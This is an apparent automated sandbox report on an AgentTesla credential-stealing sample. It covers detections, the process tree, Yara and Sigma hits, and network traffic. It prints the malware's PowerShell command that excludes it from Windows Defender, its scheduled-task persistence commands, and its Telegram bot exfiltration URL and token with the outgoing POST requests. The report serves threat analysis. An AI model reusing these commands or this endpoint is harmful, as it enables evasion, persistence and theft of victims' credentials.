
Windows Analysis Report
z1E-catalogSamples.exe

Overview

General Information

Sample name: z1E-catalogSamples.exe
Analysis ID: 1428897
MD5: 2d9dfdb275d38155cba293dc619430fa
SHA1: 523f6a7040f3b330e708a3e84d48a18bdcd77110
SHA256: 9bf25ebe467e570fc91e2003b17061c765fcb54b6d505a7db43263981504fa5f
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z1E-catalogSamples.exe (PID: 4856 cmdline: "C:\Users\user\Desktop\z1E-catalogSamples.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • powershell.exe (PID: 2780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3496 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3496 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • z1E-catalogSamples.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\z1E-catalogSamples.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
  • vZkoWbol.exe (PID: 6460 cmdline: C:\Users\user\AppData\Roaming\vZkoWbol.exe MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vZkoWbol.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • vZkoWbol.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage?chat_id=1210558492"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -

Source | Rule | Description | Author | Strings
0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
(24 entries in total; list truncated)

Source | Rule | Description | Author | Strings
0.2.z1E-catalogSamples.exe.43b9e58.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
0.2.z1E-catalogSamples.exe.43b9e58.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0.2.z1E-catalogSamples.exe.43b9e58.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | -
0.2.z1E-catalogSamples.exe.43b9e58.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | see below
  • 0x314ea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3155c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x315e6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31678:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x316e2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31754:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x317ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3187a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vZkoWbol.exe.443ad98.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
(29 entries in total; list truncated)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vZkoWbol.exe, ParentImage: C:\Users\user\AppData\Roaming\vZkoWbol.exe, ParentProcessId: 6460, ParentProcessName: vZkoWbol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", ProcessId: 7272, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe
Timestamp: 04/19/24-19:33:10.146400, SID: 2851779, Source Port: 49708, Destination Port: 443, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/19/24-19:33:06.739874, SID: 2851779, Source Port: 49706, Destination Port: 443, Protocol: TCP, Classtype: A Network Trojan was detected

AV Detection

Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage?chat_id=1210558492"}
Source: vZkoWbol.exe.7324.12.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage"}
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe, ReversingLabs: Detection: 71%
Source: z1E-catalogSamples.exe, ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe, Joe Sandbox ML: detected
Source: z1E-catalogSamples.exe, Joe Sandbox ML: detected
Source: z1E-catalogSamples.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: z1E-catalogSamples.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe, Code function: 4x nop then jmp 0663B1F7h 7_2_0663AB8C

Networking

Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49706 -> 149.154.167.220:443
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: unknown, DNS query: name: api.telegram.org
Source: Yara match, File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0, Host: api.telegram.org, Content-Length: 971, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc60a78b10ac3b, Host: api.telegram.org, Content-Length: 971, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc641d35d1784c, Host: api.telegram.org, Content-Length: 67144, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc6905e4c74819, Host: api.telegram.org, Content-Length: 67144, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc6e654d78418e, Host: api.telegram.org, Content-Length: 67144, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc71aad670e85b, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc74196518f1dd, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc6a4172022d82, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc78741e30d00b, Host: api.telegram.org, Content-Length: 72005, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc6ed5c7b45081, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc70f0a363c025, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc72be64e6da25, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc801ba947090d, Host: api.telegram.org, Content-Length: 67155, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc781440ce2291, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc84175737ff0b, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc7d9f4e31c274, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc8b4b8f6210f4, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc8048c2fa9c0c, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc8f1ec5eab97f, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc91ad9f6f5749, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc94e8357314fa, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc8528d0ad5c27, Host: api.telegram.org, Content-Length: 67138, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3, Host: api.telegram.org, Content-Length: 67151, Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3, Host: api.telegram.org, Content-Length: 67151, Expect: 100-continue, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View, IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: unknown, DNS query: name: api.ipify.org
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: api.ipify.org
Source: unknown, HTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0, Host: api.telegram.org, Content-Length: 971, Expect: 100-continue, Connection: Keep-Alive
Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://api.telegram.org
Source: z1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2139622475.000000000326F000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
